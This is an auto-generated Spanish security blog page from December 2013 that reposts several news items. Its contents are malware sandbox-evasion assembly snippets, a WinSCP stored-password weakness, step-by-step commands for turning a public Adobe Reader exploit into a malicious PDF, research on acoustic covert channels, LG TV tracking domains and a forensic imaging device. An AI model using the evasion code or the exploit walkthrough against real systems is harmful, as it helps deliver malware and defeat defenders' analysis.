lunes, 9 de diciembre de 2013

Evasión de sistemas de análisis dinámico de malware

Casi una año hemos tenido que esperar a la publicación del número 4 de Valhalla, un ezine que seguro que ya conocen (y probablemente aman) todos los escritores de virus. 

En el encontrarás infectores multiplataforma, métodos propagación, metamorfismo, nuevas técnicas (como la sorprendente auto-replicación usando la codificación del ADN) y trucos para evadir sistemas en línea de análisis dinámico como el que explica m0sa en su artículo: "SYP.01: Bypassing Online Dynamic Analysis Systems"...

Como ya vimos en el blog hace tiempo existen varios servicios online gratuitos que básicamente ejecutan el malware y monitorizan su comportamiento. Estos servicios normalmente son de dos tipos: basados en máquinas virtuales o basados en hooks, y por supuesto hay sistemas que combinan estos dos tipos.

Evasión de sistemas basados en máquinas virtuales

En las VM el sistema arranca en una máquina virtual limpia, ejecuta el malware, la para y, después de un tiempo definido, compara el resultado con el inicial para determinar los cambios realizados.

Normalmente para intentar evadir este análisis se utilizan dos técnicas:

- Detectar la presencia de VM: existen muchas técnicas para la detección de máquinas virtuales, aunque también otras tantas para ocultarlas.

- Retraso en la ejecución del malware: como la máquina virtual normalmente tiene un límite de tiempo para ejecutar el malware, es una buena idea retrasar su ejecución. No obstante el malware se retrasará también cuando se ejecute en un entorno real.    

La mayoría de los servicios online para "no aburrir" al usuario y presentarles resultados relativamente inmediatos ejecutan el malware durante menos de 10 minutos. Con sólo 3 líneas es posible evadir Anubis.

        CALL GetTickCount
CMP  EAX, 927C0H ; 600000 MILLISECONDS = 10 MINUTES
JB   Fake_Behavior

Evasión de sistemas basados en hooks

En los sistemas análisis dinámico que utilizan hooks también se ejecuta el malware (en una máquina virtual o en un servidor físico) durante un periodo de tiempo prefijado. Después el sistema hookea la mayoría y las más populares APIs del sistema para obtener la información del comportamiento del malware. Uno de los analizadores online más populares que usan esta técnica es CWSandbox.

Es muy fácil detectar el hook de un API. Antes de llamar al API hay que leer los primeros bytes de una dirección o address, si existe una instrucción de control de flujo el API está hookeada y el malware debería mostrar un comportamiento falso.

 MOV    EBX, DWORD PTR [EBP+AGetProcAddress]
MOV AL, BYTE PTR [EBX]
CMP AL, 0E9H             ; JMP
JE    FAKE_BEHAVIOR
CMP AL, 0FFH             ; JMP/CALL
JE     FAKE_BEHAVIOR
CMP AL, 0E8H             ; CALL
JE    FAKE_BEHAVIOR   
CMP    AL, 68H              ; PUSH+RET
JE    IS_FOLLOWED_BY_RET
JMP NO_HOOK
IS_FOLLOWED_BY_RET:
MOV AL, BYTE PTR [EBX+5]
CMP AL, 0C3H             ; RET
JE    FAKE_BEHAVIOR
NO_HOOK:

Pruebas y conclusiones

Para la prueba de concepto m0sa subió bots de Zeus a distinos analizadores dinámicos online y luego repitió los análisis con el mismo bot parcheado:


Todos los sistemas fueron evadidos exceptuando Joe Sandbox, cuyo estudio será presentado próximamente... 


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

domingo, 8 de diciembre de 2013

¿Malware en la red corporativa? el jefe ha vuelto a ver porno...

En octubre de 2013 ThreatTrack Security llevó a cabo una encuesta a 200 analistas de malware de distintas empresas de EE.UU. Sus conclusiones son cuanto menos curiosas y también queríamos compartirlas con vosotros:

- casi 6 de cada 10 analistas reconocen que han investigado o tratado fugas de datos que no se han dado a conocer nunca por la empresas afectadas
- las empresas con más de 500 empleados son más propensas a haber tenido una incursión no declarada
- el 40% de los encuestados dijo que la mayor dificultad para defender la red de su organización es el hecho de que no tienen suficiente personal de seguridad altamente cualificado
- el 67% también dijo que la complejidad del malware es otro factor principal, el 67 % el volumen de los ataques de malware y el 58% citó la falta de efectividad de las soluciones anti-malware
- los analistas dedican mucho tiempo a revisar infecciones de malware fácilmente evitables que se originan en los niveles más altos de la organización y fundamentalmente debido a que:
. visitan sitios web pornográficos (40 %)
. hacen clic en un enlace malicioso en un correo electrónico de phishing (56 %)
. permiten que un miembro de su familia use un dispositivo de propiedad de la empresa (45 %)
. instalan alguna aplicación móvil maliciosa (33 %)
- más de la mitad (52 %) de todos los analistas de malware dijeron que normalmente les lleva más de 2 horas analizar una nueva muestra de malware. Por el contrario, sólo el 4 % dijo que son capaces de analizar un nuevo ejemplar de malware en menos de una hora
- un 35 % comenta que no tienen acceso a una solución automatizada de análisis de malware
- por último también se les preguntó a los analistas sobre el espionaje cibernético. El 37 % de los encuestados dijo que los EE.UU. es el país más experto en la realización de espionaje cibernético, seguido de cerca por China con un 33 %

¿Y vosotros que opináis? Real como la vida misma ¿verdad?

Fuente: Malware Analysts Say Breaches Are Not Being Disclosed by Their Employers


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Ten cuidado si guardas las contraseñas de tus sesiones con WinSCP...

Afortunadamante poco a poco se está sustituyendo el uso de FTP por SCP o SFTP sobre SSH-1 y SSH-2 para la transferencia de ficheros en Internet. 

Quizás unos de los clientes más utilizados bajo Windows es WinSCP. Esta herramienta te permite almacenar sesiones y también guardar sus respectivas contraseñas, algo en principio no recomendable:


Por defecto, WinSCP realiza una serie de sencillas operaciones bit a bit usando el nombre de usuario concatenado con el nombre de máquina y almacena la contraseña cifrada en la cadena del registro "HKEY_Current_User\Software\Martin Prikryl\WinSCP 2\Sessions" o en un fichero INI localizado en el mismo path del ejecutable del programa:
  [Sessions\usuario@ftp.pruebas.cz]HostName=ftp.pruebas.czUserName=usuarioFSProtocol=2Password=B22F7258DC45B2991A080D15191F150B1A6C6F2F3A282C7235393F35712F392C2A353F35332B123F22310839312C332E3D302D6E6B
Revertir las funciones y obtener la contraseña en claro es trivial y, como WinSCP además es de código abierto y se pueden encontrar las funciones correspondientes (Security.cpp), existen ya varias herramientas como winscppwd, astlog y hasta un módulo de Metasploit. Incluso podréis usar en línea http://codedementia.com/WinSCP/index.php aunque yo nunca recomiendo introducir contraseñas reales en este tipo de portales.

¿La solución? Activar la opción de usar una Contraseña maestra para que las contraseñas se cifren mediante AES256:


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Exploit para Adobe Acrobat Reader con evasión de sandbox y de ASLR/DEP

A mediados de febrero de este año y en varias campañas de malware se utilizó un 0-day para las últimas versiones de Adobe Reader por el cual un atacante podía provocar un desbordamiento de buffer y ejecutar código arbitrariamente mediante un PDF malicioso especialmente modificado.

Hoy, las dos vulnerabilidades ya tienen su CVE asignado (CVE-2013-0640 y CVE-2013-0641) y @w3bd3vil y @abh1sek han rescatado de un foro ruso y adaptado un exploit que es capaz de evadir ASLR/DEP y el sandbox de la aplicación.
Afecta a las versiones 11.0.1, 11.0.0, 10.1.5, 10.1.4, 10.1.3, 10.1.2, 10.1 y 9.5 de Adobe Acrobat Reader y funciona bajo Windows 7 (32 y 64bit) y XP.

Para probarlo nada más sencillo. Primero necesitamos instalar Ruby 1.9 (http://dl.bintray.com/oneclick/rubyinstaller/rubyinstaller-1.9.3-p484.exe?direct) y las gemas origami y metasm:

d:\Ruby193\bin\gem.bat install metasm
d:\Ruby193\bin\gem.bat install origami -v "=1.2.5"

Luego descargamos el exploit (http://www.exploit-db.com/sploits/29881.tar.gz) y lo descomprimimos, lo desempaquetamos y echamos un vistazo a sus parámetros y uso:

D:\Hacking\Exploits\29881>d:\Ruby193\bin\ruby.exe xfa_MAGIC.rb
Usage: xfa_MAGIC.rb [options]
-i, --input [FILE]               Input PDF. If provided, exploit will be injected into it (optional)
-p, --payload [FILE]             PE executable to embed in the payload
--low-mem                    Use Heap spray suitable for low memory environment
-o, --output [FILE]              File path to write output PDF
-h, --help                       Show help

Después simplemente seleccionamos nuestro ejecutable PE para el payload (máximo 114688 bytes) y el nombre del fichero PDF:

D:\Hacking\Exploits\29881>d:\Ruby193\bin\ruby.exe xfa_MAGIC.rb -p prueba.exe -o poc.pdf
[+] Loading package
[+] Embedding user executable (size: 18944)
[+] Encoding payload (key: 249 kii: 251)
[+] Generating file: poc.pdf
 
Buen fin de semana y happy hacking!


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Desarrollan malware capaz de transmitir datos a través de sonidos inaudibles

Seguro que os acordáis del misterioso malware badBIOS porque según se decía era capaz de transmitirse a través del sonido. Lejos de ser una fantasía de Dragos Ruiu ahora parece demostrarse que, en teoría, si es posible...

Michael Hanspach y Michael Goetz, investigadores del Instituto Fraunhofer de Alemania para la Comunicación, tratamiento de la información y ergonomía, han publicado recientemente un documento sobre los canales de comunicación encubiertos que utilizan señales de audio para transmitir datos de un sistema informático a otro.

Según Ars Technica, los expertos han desarrollado un prototipo de malware que es capaz de transmitir pequeñas cantidades de información, tales como las pulsaciones de teclado, a través de señales de audio inaudibles.

La prueba de concepto realizada por los investigadores tiene un alcance de 19,7 metros a través del aire mediante el uso de altavoces y micrófonos conectados en los ordenadores. Si bien puede no parecer mucho, se podría diseñar una red de malla acústica encubierta para permitir la transmisión de datos a través de múltiples hosts de nodos infectados.

Este tipo particular de malware puede ser muy peligroso para las organizaciones que mantienen ciertos sistemas críticos aislados de la red con el fin de mantener seguros los datos almacenados en ellos.

La PoC desarrollada por los expertos sólo puede transferir datos a una velocidad de 20 bits por segundo, lo cual no es mucho. Sin embargo, podría ser más que suficiente para transmitir ciertos tipos de datos, como las credenciales de inicio de sesión.

Los investigadores también han detallado los pasos que se pueden tomar para proteger los ordenadores contra tales amenazas. Las medidas incluyen sistemas inhibidores de audio mediante el filtrado de paso bajo y sistemas de detección de intrusos que controlan irregularidades en la entrada y salida de audio.

Descarga del paper: “On Covert Acoustical Mesh Networks in Air”

Fuentes:
- Researchers Show How Malware Can Transmit Data via Audio Signals
- Scientist-developed malware covertly jumps air gaps using inaudible sound
- Scientists create malware that communicates using sound, no network required


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

¿Tienes un televisor LG? Pues seguramente te estén monitorizando...

Al ver publicidad en su nueva televisión, el dueño de un LG Smart TV en Gran Bretaña decidió investigar y descubrió que LG avisaba de sus prácticas de recolección de datos a sus anunciantes potenciales:

"LG Smart Ad analiza los programas favoritos de sus usuarios, el comportamiento online, la búsqueda de palabras clave y otra información para ofrecer anuncios relevantes a las audiencias objetivo. Por ej., LG Smart Ad puede ofrecer trajes de buen corte a hombres o cosméticos y fragancias seductoras a mujeres.

Por otra parte, LG Smart Ad es capaz de ofrecer útiles y variados informes de rendimiento de publicidad que otros anuncios de radiodifusión en directo no pueden, para identificar con precisión la eficacia publicitaria real."
El investigador, aka DoctorBeet, realizó una serie de capturas de tráfico y pudo comprobar cómo se enviaba información acerca de los canales que se estaban visualizando en cada momento y los nombres de los ficheros que contenían sus dispositivos conectados por USB.

¿Espeluznante verdad? Pues en realidad es una opción que viene activada por defecto en el menú  de opciones "Collection of watching info:"...

 
...que sin embargo es ignorada porque aunque se desactive se sigue recolectamdo información. 

Mientras, la respuesta de LG es que el cliente acepta los Términos y Condiciones de su televisor y le deriva al minorista.

Por otro lado DoctorBeet ha recopilado una lista inicial de los dominios de Internet que se pueden bloquear en los routers domésticos para detener el espionaje y la publicidad en los televisores LG:

     ad.lgappstv.com
yumenetworks.com
smartclip.net
smartclip.com
smartshare.lgtvsdp.com
ibis.lgappstv.com

Si tienes un TV LG, esto le liberará de ver anuncios incrustados en la pantalla y de tener sus hábitos televisivos controlados, mientras que todavía deberás poder aplicar actualizaciones de firmware.

Fuente: LG Smart TVs logging USB filenames and viewing info to LG servers


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

FIREBrick: un generador de imágenes y write blocker de código abierto

En los últimos años ha ido creciendo exponencialmente la necesidad de obtener y preservar evidencias digitales y lo que antes era tarea de especialistas ahora se ha convertido en rutina de muchos departamentos. Desgraciadamente la financiación muchas veces no acompaña a esta demanda.

FIREBrick es una alternativa de código abierto a los bloqueadores de escritura (write blockers) de hardware comerciales y generadores de imágenes de disco que se puede montar utilizando componentes con un valor que ronda tan sólo los 200€:

- Placa base ASRock E350M1
- 1Gb de memoria RAM DDR3 (1333 o 1066)
- Dynamode PCIX3FW 3-Port Firewire PCIe
- Una pantalla LCD2USB de 20×4
- Fuente 120W+ PSU
- Caja mini-ITX
- Discos SATA (si quieres almacenamiento interno)

Características:

- Imágenes de disco independientes, a velocidades de hasta 5 GB por minuto
- Imágenes hasheadas sobre la marcha con controles de verificación
- El disco de almacenamiento se puede cifrar (mediante LUKS)
- Funcionalidad bloqueador de escritura FireWire, la unidad de destino es visible como un disco duro FireWire
- Portátil: cabe en una pequeña caja HTPC (incluyendo pantalla)
- Libre, el firmware es de código abierto
- Puede ser totalmente personalizable según las necesidades específicas de los departamentos
- Se adhiere a los protocolos de pruebas con herramientas forenses de la NIST
- Almacenamiento interno configurado automáticamente (ninguno, solo disco o RAID)
- RAID mirroring y soporte striping
- Configuraciones ilimitadas - posibles ideas de desarrollo_ Android, Kindle, imágenes de USB, etc.

Código fuente, ROM e instrucciones:

https://github.com/leetobin/firebrickRemote


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.